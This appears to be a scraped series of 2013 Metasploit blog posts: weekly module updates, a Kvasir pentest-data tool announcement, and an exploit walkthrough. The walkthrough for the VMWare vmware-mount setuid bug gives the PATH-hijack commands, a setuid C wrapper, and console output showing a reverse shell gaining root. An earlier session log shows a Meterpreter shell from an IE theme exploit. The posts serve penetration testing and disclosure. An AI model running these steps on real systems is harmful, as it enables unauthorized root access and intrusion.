[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.203:1637) at 2013-09-18 13:31:27 -0500

msf exploit(ms13_071_theme) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: SMALLBUSINESS\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit

 

The SMBServer mixin needs (root) privileges to bind to the port 445/TCP. It will also fail if the port is busy (common on Windows environments or Samba servers). Since the code overriding the SMBServer mixin is brand new, I'd love to hear from you if it worked for you. Remember it has been tested only for Windows XP SP3 and Windows 2003 SP2 - the currents targets for this exploit.

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments

VulnBubbles.pngData management is half the battle for penetration testing, especially when you're auditing large networks. As a penetration tester with Cisco’s Advanced Services, I've created a new open source tool called Kvasir that integrates with Metasploit Pro, Nexpose, and a bunch of other tools I use regularly to aggregate and manage the data I need. In this blog post, I'd like to give you a quick intro what Kvasir does - and to invite you to use it with Metasploit Pro.

 

Cisco’s Advanced Services has been performing penetration tests for our customers since the acquisition of the Wheel Group in 1998. We call them Security Posture Assessments or SPA for short, and I’ve been pen testing for just about as long. During our typical assessments we may analyze anywhere between 2,000 and 10,000 hosts for vulnerabilities, perform various exploitation methods such as account enumeration and password attempts, buffer/stack overflows, administrative bypasses and others. We then have to collect and document our results within the one or two weeks we are on-site and prepare a report.

 

How can anyone keep track of all this data, let a lone work together as a team? Are you sure you really found the holy grail of customer data and adequately documented it? What if you’re writing the report but you weren’t the one who did the exploit?

 

The answer is to build a data management application that works for you. The first iterations the SPA team created were a mixture of shell, awk, sed, tcl, perl, expect, python and whatever else engineers felt comfortable programming in. If you remember the Cisco Secure Scanner product (aka NetSonar) then our early tools were this with extra goodies.

 

Welcome to the 21st Century

As time moved on our tools became unfriendly to larger data sets, inter-team interaction, and support of new data types were difficult. The number of issues detected by vulnerability scanners started to increase and while we have always been able to support very large environments the edges were starting to bulge.

 

We don’t believe this scenario is unique to us. We also don’t believe current publicly available solutions really help. Most teams we’ve talked with have used a variant of issue tracking software (TRAC, Redmine) or just let Metasploit Pro handle everything.

 

We think this isn’t good enough which is why we are releasing our tool, Kvasir, as open source for you to analyze, integrate, update, or ignore. We like the tool a lot and we think it fills a missing key part of penetration testing. It’s not perfect but it’s grown up a lot and will improve.

 

What’s Kvasir?

Kvasir is a web-based application with its goal to assist “at-a-glance” penetration testing. Disparate information sources such as vulnerability scanners, exploitation frameworks, and other tools are homogenized into a unified database structure. This allows security testers to accurately view the data and make good decisions on the next attack steps.

 

Multiple testers can work together on the same data allowing them to share important collected information. There’s nothing worse than seeing an account name pass by and finding out your co-worker cracked it two days ago but didn’t find anything “important” so it was never fully documented.

 

Supported Data Sources

At current release Kvasir directly supports the following tools:

  • Rapid7 Nexpose Vulnerability Scanner
  • Rapid7 Metasploit Pro (limited support for Express/Framework data)
  • Nmap Security Scanner
  • ShodanHQ
  • THC-Hydra
  • Foofus Medusa
  • John The Ripper
  • …and more!

 

Nexpose  and Metasploit Pro Integration

Since the SPA team generally uses Rapid7’s Nexpose  and Metasploit Pro, Kvasir integrates with these tools via API. We purposefully did not incorporate some features but may have future plans for others.

 

The importation of Nexpose site reports is fully automated. Just pick a site and let Kvasir generate the XML report, download and parse it! After parsing, the scan file can be imported into a Metasploit Pro instance.

 

For Metasploit Pro results you must first generate an XML report but after that is done Kvasir will download and parse it automatically. Kvasir also supports the db_creds output and will automatically import pwdump and screenshots through the Metasploit Pro API.

 

Metasploit Pro’s automatic Bruteforce and Exploit features can be called directly from Kvasir. Just select your list of target IP Addresses and go!

 

From Vulnerability to Exploit

So you have a host with a list of vulnerabilities, but what is exploitable? Metasploit Pro as well as other exploit frameworks and databases are mapped to vulnerability and CVE entries granting the user an immediate view of potential exploitation methods.

 

Screenshots!

The initial screen of Kvasir shows two bar graphs detailing the distribution of vulnerabilities based on severity level count and host/severity count as well as additional statistical data:

 

1.png

 

A tag-cloud based on high-level severities (level 8 and above) is included which may help pinpoint the highest risk vulnerabilities. This is based solely on vulnerability count.

 

Kvasir’s Host Listing page displays details such as services, vulnerability counts, operating systems, assigned groups and engineers:

 

2.png

 

 

Kvasir supports importing exploit data from Nexpose (Exploit Database and Metasploit) and other tools. Link to exploits from vulnerabilities and CVE assignments are made so you can get an immediate glance at what hosts/services have exploitable vulnerabilities.

 

3.png

 

The host detail page provides an immediate overview of valuable information such as services, vulnerability mapping, user accounts, and notes, all shared between testing engineers:

 

4.png

 

Of course as you collect user accounts and passwords it’s nice to be able to correlate them to hosts, services, hashes and hash types, and sources.

 

5.png

 

Where can I get more info?

For more information, see my post on Kvasir on the Cisco blog. You can also get the Kvasir source code on GitHub. Fork, Install, Review, Contribute!

todb

Weekly Update

Posted by todb Employee Sep 18, 2013

Windows Meterpreter: Reloaded

If you've been around Metasploit for any length of time, you know that Meterpreter is the preferred and de facto standard for manipulating a target computer after exploit. While Meterpreter and Metasploit go hand-in-hand, we did manage to get some code seperation between the two by breaking Windows Meterpreter out to its own open source respository on GitHub.

 

As threatened in a previous blog post, we've got some fresh eyeballs looking at that codebase. One of the major hassles with maintaining and improving Meterpreter has been its finicky build requirements. Well, that's been pretty much totally solved; thanks to the valiant efforts by OJ Reeves, building Meterpreter from source locally is as simple as a) ensuring you have the documented build dependencies, then running 'make.' Yep, good old trusty 'make.' That's it!

 

Getting a sane and understandable build environment is but the first step for getting a stable, testable- and buildable-by-anyone Meterpreter out there, and has already resolved a bug or two that's been bothering us forever. For example, thanks to this refresh, OJ was able to spot and fix a problem with 64-bit pointer truncation that was wanging up process migration under certain circumstances.

 

So, if you're of the Windows C++ developer persuasion, and have a favorite bug in Meterpreter, please check out the new environment. I promise, you won't end up clawing your eyes out over build errors and warnings. If you do, please, a) get to a hospital, and then, b) file a bug. If you just care about having fresh binaries to use on your engagement, the shipping code has been compiled for you and is already hanging out in your Metasploit distribution of choice.

 

Gemfile updates

If you're running a packaged build, you won't notice anything about the recent refresh of a pile of Ruby gem dependencies; the installers and updaters all take care of these things for you. However, if you're running Metasploit straight from a git repo (either ours or some fork of Rapid7's), you'll want to run either 'bundle install' to get a quick refresh, or update with 'msfupdate' (which takes care of these things for you).

 

These gem updates are not particularly exciting, but I know that when people update and see the warning about missing Ruby gems, they occasionally freak out and think that everything's broken. Don't fret. All you need to do is get your gems refreshed and you'll be back in the exploitation business in just a minute.

 

New Modules

We've got ten new modules this week -- seven exploits, three auxiliary modules. Of particular interest are the two new exploits targeting the Sophos Web Appliance. If you're relying on this gear to help protect your internal user base from evilness on the Web, you will definitely want to update to the latest patched version. It can be pretty career-limiting when when your enterprise gets owned via a vulnerability in security software.

 

Exploit modules

 

Auxiliary modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Exploiting Internet Explorer (MS13-055)

 

This week, we open with a new IE exploit. This is a pretty recent patch (from July, 2013), and more notably, it appears it was silently patched without attribution to the original discoverer, Orange Tsai. So, if you're a desktop IT admin, you will certainly want to get your users revved up to the latest patch level. Thanks tons to Peter WTFuzz Vreugdenhil and of course Wei sinn3r Chen for knocking this exploit out.

 

While the silent patch killed Orange's 0-day a week before he was scheduled to present it at Hitcon, this does seem to imply that the folks at Microsoft are getting better and better at running their own fuzzers at Internet Explorer. That's ultimately Good News for the Internet, and demonstrates that software vendors continue to take post-development security seriously.

 

That said, let's take a look at the other end of the spectrum...

 

GE Proficy Directory Traversal (ICSA-13-022-02)

Also this week, we have a new module from our own Juan Vazquez, exploting a bug found in something called GE Proficy Cimplicity. For details, see the link below. With it, unauthenticated users can snag pretty much any file off of the target (Windows-based) machine, which of course includes sensitive files.

 

I bring this module up in particular because this GE Proficy is used in SCADA applications, which, if you've been paying attention, means that there is a huge, untapped attack surface there. Take this bug for example; it's a straight directory traversal. No need for fancy encodings, tricky filter evasions, or anything like that; just ../../../../ your way up to the goods on the machine running this web server.

 

I know, pretty leet.

 

I don't want to knock GE too hard on this, of course, since this is pretty much the state of affairs with any class of security bug you care to name when it comes to SCADA and embedded devices. Working on auditing these applications is like stepping back into the 20th Century while being armed with fancy, free exploit toolkits from the 21st.

 

I've worked on some disclosure material with ISC-CERT, which is the clearinghouse for these kinds of vulnerabilities, and I know those guys are plenty capable and know what they're doing. I just feel like we see this kind of thing in SCADA-land over, and over, and over again, so I kind of feel like we're getting something wrong, as a security industry, when it comes to educating these hardware vendors on how to conduct themselves when releasing software. What can we do better? How can we impart the last 10 years of secure coding know-how to the people that are providing critical infrastructure? I'm hopeful that if Metasploit modules attacking this stuff gets out there in the public, it'll be a wake-up call. Is there a better way?

 

Space Conflicts

It was as if a million tabs cried out in terror, and were suddenly silenced. As threatened in last week's blog post, we pulled the trigger on retabbing two big chunks of Metasploit, the /lib and /modules directories. If you're a Metasploit contributor, and you notice that your recent or upcoming pull request is suddenly in a conflicted state, this is almost certainly why. Dealing with it is pretty straight forward -- please see  http://r-7.co/MSF-TABS for some instructions on how to unconflict your shiny new patches and feature additions.

 

Note, this won't interefere at all with entirely new modules (which is why not all of the outstanding PRs were conflicted), but even so, you should get used to normal two-space tabs for your Metasploit programming. In the meantime, now is a fine time to rebase your own fork of rapid7/metasploit-framework master branch against ours. On normal ISP speeds, this should take but a moment, even though it's more than a half-million lines of change. Aren't you glad we ditched SVN last year?

 

New Modules

We've got five new modules this week, two exploits, two auxiliary modules, and one post.

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Meterpreter Updates

This is a big week for Meterpreter. For starters, we've landed a new Meterpreter Python payload. Yes, yes, I know, you thought that Metasploit was all Ruby all the time, but this and the Python payloads for bind shells from Spencer McIntyre should help out on advancing the state of Meterpreter by leaps and bounds. Despite Metasploit's massive Ruby footprint, most security developers know Python well enough to scratch their own penetration testing itches in it, so I'm looking forward to a lot of active development here. Plus, since Python is part of the Linux Standard Base, you're quite likely to find it on pretty much any normal Linux distribution, so it should see a lot of use for non-Microsoft targets.

 

In other Meterpreter news, we have a new contributor entering the fray on the Windows 32-bit and 64-bit side by the name of OJ Reeves. His entire mission in life (at least, for now) is to make it much easier for normal humans to compile, test, and extend Meterpreter for Windows platform. If you've been down this hacking Meterpreter path in the past, you know what kind of pit vipers can be lurking in that code, so expect to see some massive improvements there in the next couple weeks.

 

VMWare Setuid Exploit (CVE-2013-1662)

This week also sees a new local privilege exploit targeting Linux, the VMWare Setuid vmware-mount Unsafe popen(3) module (aka, vmware-mount.rb). Discovered by Google's Tavis Ormandy and implemented by our own James Egypt Lee, this exploits a setuid vulnerability that takes advantage of a VMWare installation to sneak a root shell. Egypt discusses the Metasploit implementation at length in this blog post, so I encourage you to check it out. Note that this module does not enable attackers to escape from the VMWare guest to the host operating system; it's specifically useful for taking advantage of a VMWare installation to elevate privileges on the host OS itself.

 

More OSX Hijinks

The other set of modules I want to hilight is a trio from Rapid7's Joe Vennix: the OSX Capture Userspace Keylogger module, the OSX Manage Record Microphone module, and the OSX Manage Webcam module. As you can probably guess by their titles, these are all post-exploit modules penetration testers can exercise to extend their eyes and ears into the site under test. These kind of Hollywood-hacker style post-exploit tricks are exactly the kind of thing that great to demo to clients to help explain the true risk associated with Apple desktop / laptop bugs, since they are, by their nature, pretty dramatic and fun to use.

 

Tab Assassin @Tabassassin

 

Finally, this week, we're going to be pulling the trigger on the great retabbing of Metasploit in order to bring us up to the normal, regular coding standards common to Ruby projects. While I have every expectation this change will be traumatic for long-time contributors, we're faithfully document everything along the way under the shortlink http://r-7.co/MSF-TABS. If you have patches and pull requests that are suddenly thrown into a conflicted state this week, the retabbing from @Tabassassin (pictured right) is probably the root cause. But never fear, just read the fine material regarding the change, and you should be back into an unconflicted state in two shakes.

 

New Modules

We've got eleven new modules this week. Including the ones mentioned above, we've got another three ZDI-derived exploits (which are always informative), a really nicely commented implementation of the MS13-059 exploit for Internet Explorer, and a pair of Windows post modules that can be used to further extend control over the victim machine. As always, thanks everyone for your contributions!

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

On August 22, Tavis Ormandy dropped a bug in VMWare that takes advantage of a build configuration in Linux distributions. Providing you have user-level access to a Debian or Ubuntu box with VMWare installed, this exploit gives you root access. It's a fun bug and I want to explain how the Metasploit module for it works:

 

The background

There's this thing called priv_mode in bash that means it will drop privs if euid != uid. Anyone who has ever tried to "chmod +s /bin/sh" will recognize this as a minor frustration that is easily circumvented by simply writing a wrapper in C that does something like:

int main(int argc, char **argv) {
  setresuid(0,0,0);
  execl("/bin/sh");
  return 0;
}


 

That is not the thing that priv_mode is meant to fix (although it is annoying if you don't know what's happening when it appears that your privilege escalation bug is getting you an unprivileged shell). What it is really effective at stopping is the case of a setuid binary calling system(3) or popen(3) before dropping privs. It turns out that VMWare Workstation and Player ship with a binary called vmware-mount that does exactly this.

 

The steps for achieving privilege escalation are pretty straight forward:

  1. Create an executable to be used as our payload
  2. Write it to the host OS's filesystem (in this case, we have to call it lsb_release)
  3. Mark it executable
  4. Run the vulnerable setuid binary

 

The exploit

This exploit will drop our payload as an executable, so first we include the Msf::Exploit::EXE mixin, which will give us access to several convenience methods for creating executables.

include Msf::Exploit::EXE

 

Then, in the exploit method, we create an ELF file with generate_payload_exe. This method is smart enough to build the right kind of executable for whatever platform and architecture is supported by the module and currently selected. Then we just write the file and execute the vulnerable utility with the current directory added to the path. These three lines are basically the meat of the exploit.

write_file("lsb_release", generate_payload_exe)
cmd_exec("chmod +x lsb_release")
cmd_exec("PATH=.:$PATH vmware-mount")

 

When our shell runs, it will block the controlling process. In our case, that would cause the existing shell session to hang, which is pretty impolite. To solve that problem, we prepend some shellcode to the generated binary that just forks and exits the parent process, leaving our payload to happily frolick about in the background.

 

The money shot

15:09:57 0 1 exploit(vmware_mount) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(egypt) gid=1000(egypt) groups=1000(egypt),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)
^Z
Background session 1? [y/N]  y

15:09:05 0 1 exploit(vmware_mount) > show options

Module options (exploit/linux/local/vmware_mount):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.99.1     yes       The listen address
   LPORT  1234             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


15:09:10 0 1 exploit(vmware_mount) > run

[*] Started reverse handler on 0.0.0.0:1234
[*] Max line length is 65537
[*] Writing 175 bytes in 1 chunks of 529 bytes (octal-encoded), using printf
[*] Sending stage (36 bytes) to 192.168.99.1
[*] Command shell session 2 opened (192.168.99.1:1234 -> 192.168.99.1:41671) at 2013-09-04 15:08:16 -0500

id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare),1000(egypt)

 

Want to give this a try yourself?

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

Sudo password bypass on OSX

This week's update includes a nifty local exploit for OSX, the sudo bug described in CVE-2013-1775. We don't have nearly enough of these Apple desktop exploits, and it's always useful to disabuse the Apple-based cool-kids web app developer crowd of the notion that their computing platform of choice is bulletproof.

 

Joe Vennix, the principle author of this module, is, in fact, of that very same Apple-based developer crowd, and usually busies himself on cranking out features for Metasploit Pro. But, he's been hanging out with the wrong crowd -- the exploit devs here at Rapid7 -- so over the weekend, he put together this implementation of Todd C. Miller's and Marco Schoepl's sudo time-changing bug. Turns out, OSX allows regular users to adjust the system time. This, in turn, creates the opportunity to promote and escalate the privileges of a compromised user account to root without having to know that user's password, assuming the victim user has used sudo at least once before (which is often the case for local OSX users).

 

Pretty neat trick. For more details on why this works, see the oss-sec post from early this year. Thanks Joe!

 

Housekeeping!

So, I don't know if you noticed, but over the last couple weeks, we've managed to hack and slash our way through a great big pile of Metasploit Framework bugs. First off, we just came off a Rapid7 push to shore up the continuous integration test infrastructure -- you can peek in on that at Travis-CI, and see that we juiced up the number of automated tests from about 980 to (as of now) 1,437 automatic tests that run with every build. Pretty much everyone here in the Rapid7 Metasploit hideout helped out with that, and so today, we have a really solid foundation for you, the community contributor, to start putting together useful regression testing on your favorite chunk of Metasploit.

 

In addition, our own Wei @sinn3r Chen took up the cause of cleaning up a bunch of existing modules to conform to our current code standards, opening and resolving about 50 tickets just on his own.

 

The moral of this story is that contributing to Metasploit Framework can be more than what most people think of -- writing exploit modules that exercise vulnerabilities. While that kind of work is probably the most fun and glamorous part of Metasploit, there are a lot of areas that could use automated testing, cleanup, and focused bug hunting. So, if you're more of a general Ruby hacker and not so much a security-focused hacker, that's totally okay by me. Feel free to jump in and fire off pull requests in our direction that provide repeatable testing for core Metasploit functionality, and you'll have a direct impact on improving the state of the art of open source security.

 

New Modules

We've got three new exploits this week. A little less than usual, but man did we clean up a bunch of older modules. Twenty four in all were touched for this release.

 

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Filter Blog

By date: By tag: